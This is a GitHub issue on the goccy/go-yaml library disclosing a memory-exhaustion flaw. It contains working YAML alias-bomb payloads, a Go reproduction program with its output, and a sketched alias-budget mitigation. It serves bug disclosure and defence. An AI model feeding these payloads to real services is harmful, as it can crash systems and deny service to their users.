goccy / go-yaml

YAML support for the Go language
MIT License

Security issue: Parsing malicious or large YAML documents can consume excessive amounts of CPU or memory. #461

Open nclv opened 2 months ago

nclv commented 2 months ago

Improper input validation allows malicious YAML payloads to be parsed, causing the server to consume excessive CPU or memory and potentially to crash and become unavailable.

How to reproduce

bomb.small.yaml:

a: &a [_,_,_,_,_,_,_,_,_,_,_,_,_,_,_]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e,*e]

main.go:

package main

import (
    "fmt"
    "log"
    "math"
    "os"

    "github.com/goccy/go-yaml"
)

// prettyByteSize formats a byte count using binary (1024-based) units.
func prettyByteSize(b int) string {
    bf := float64(b)
    for _, unit := range []string{"", "Ki", "Mi", "Gi", "Ti", "Pi", "Ei", "Zi"} {
        if math.Abs(bf) < 1024.0 {
            return fmt.Sprintf("%3.1f%sB", bf, unit)
        }
        bf /= 1024.0
    }
    return fmt.Sprintf("%.1fYiB", bf)
}

func main() {
    // Read the small YAML bomb and report its size on disk.
    data, err := os.ReadFile("./bomb.small.yaml")
    if err != nil {
        log.Fatalf("error: %v", err)
    }
    fmt.Printf("--- initial file:\n%s\n\n", prettyByteSize(len(data)))

    target := make(map[interface{}]interface{})

    // Unmarshal expands every alias into a full copy of its anchored value.
    err = yaml.Unmarshal(data, &target)
    if err != nil {
        log.Fatalf("error: %v", err)
    }
    // fmt.Printf("--- m:\n%v\n\n", target)

    // Marshal the expanded value back to YAML to measure how much it grew.
    data, err = yaml.Marshal(&target)
    if err != nil {
        log.Fatalf("error: %v", err)
    }
    fmt.Printf("--- target dump:\n%s\n\n", prettyByteSize(len(data)))
}

go run main.go
--- initial file:
227.0B

--- target dump:
21.9MiB

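The following .yaml file extends the same pattern by three more levels (g, h, i), so it expands to roughly 1,000 times as many elements and will be unmarshalled into several GB.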

a: &a [_,_,_,_,_,_,_,_,_,_,_,_,_,_,_]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h,*h]
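The growth can be checked with a little arithmetic: the first sequence holds 15 scalars, and each later level repeats the previous one 10 times. A minimal sketch of that calculation follows; the function name `leafCount` and its parameters are made up for illustration, and it assumes every alias is expanded into a full copy.

```go
package main

import "fmt"

// leafCount returns the total number of scalar elements across all top-level
// keys once every alias has been expanded by copying. The first sequence holds
// `base` scalars; each of the `extraLevels` following sequences repeats the
// previous one `fanout` times. (Hypothetical helper, for illustration only.)
func leafCount(base, fanout, extraLevels int) int {
	total, level := 0, base
	for i := 0; i <= extraLevels; i++ {
		total += level
		level *= fanout
	}
	return total
}

func main() {
	// a..f: one base level plus five alias levels.
	fmt.Println("small (a..f):", leafCount(15, 10, 5))
	// a..i: one base level plus eight alias levels.
	fmt.Println("large (a..i):", leafCount(15, 10, 8))
}
```

Each added level multiplies the number of elements by 10 while adding only one short line to the input, which is why limiting the input size alone does not help.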

Expected behavior

Some checks should be implemented to prevent excessive memory usage. See "Add large document benchmarks, tune alias heuristic, add max depth limits" (#515) and go-yaml/yaml/blob/v3/decode.go.
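One possible shape for such a check is an alias budget: count how many nodes are decoded in total and how many of them are decoded while expanding an alias, then abort once the document is non-trivial and almost all of the work comes from aliases. The sketch below works on a toy node tree and is not goccy/go-yaml code. Every name in it (`aliasBudget`, `walk`, `buildBomb`) and both thresholds (1000 nodes, ratio 0.9) are assumptions chosen for illustration.

```go
package main

import (
	"errors"
	"fmt"
)

var errExcessiveAliasing = errors.New("document contains excessive aliasing")

// aliasBudget is a hypothetical guard, not part of any real library.
type aliasBudget struct {
	decoded  int     // all nodes visited so far
	viaAlias int     // nodes visited while expanding an alias
	minNodes int     // documents at or below this size are never rejected
	maxRatio float64 // highest tolerated viaAlias/decoded ratio
}

// visit records one decoded node and reports an error once the budget is exceeded.
func (b *aliasBudget) visit(insideAlias bool) error {
	b.decoded++
	if insideAlias {
		b.viaAlias++
	}
	if b.decoded > b.minNodes && float64(b.viaAlias)/float64(b.decoded) > b.maxRatio {
		return errExcessiveAliasing
	}
	return nil
}

// node is a toy stand-in for a parsed YAML node.
type node struct {
	children []*node
	alias    *node // non-nil when this node is an alias of an anchored node
}

// walk visits the tree the way an alias-expanding decoder would.
func walk(n *node, insideAlias bool, b *aliasBudget) error {
	if err := b.visit(insideAlias); err != nil {
		return err
	}
	if n.alias != nil {
		return walk(n.alias, true, b)
	}
	for _, c := range n.children {
		if err := walk(c, insideAlias, b); err != nil {
			return err
		}
	}
	return nil
}

// buildBomb mirrors the documents above: 15 scalars, then `levels` sequences
// that each hold 10 aliases of the previous sequence.
func buildBomb(levels int) *node {
	root, prev := &node{}, &node{}
	for i := 0; i < 15; i++ {
		prev.children = append(prev.children, &node{})
	}
	root.children = append(root.children, prev)
	for l := 0; l < levels; l++ {
		cur := &node{}
		for i := 0; i < 10; i++ {
			cur.children = append(cur.children, &node{alias: prev})
		}
		root.children = append(root.children, cur)
		prev = cur
	}
	return root
}

func main() {
	b := &aliasBudget{minNodes: 1000, maxRatio: 0.9}
	err := walk(buildBomb(8), false, b)
	fmt.Println("error:", err, "nodes visited before stopping:", b.decoded)
}
```

With these illustrative thresholds the walk over the nine-level document stops after roughly a thousand visited nodes instead of over a billion, while a document without aliases is never rejected. A real decoder would probably need the tolerated ratio to depend on document size so that legitimate heavy use of anchors is still accepted.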

Version Variables

Additional context

CVE-2022-3064, GHSA-6q6q-88xp-6f2r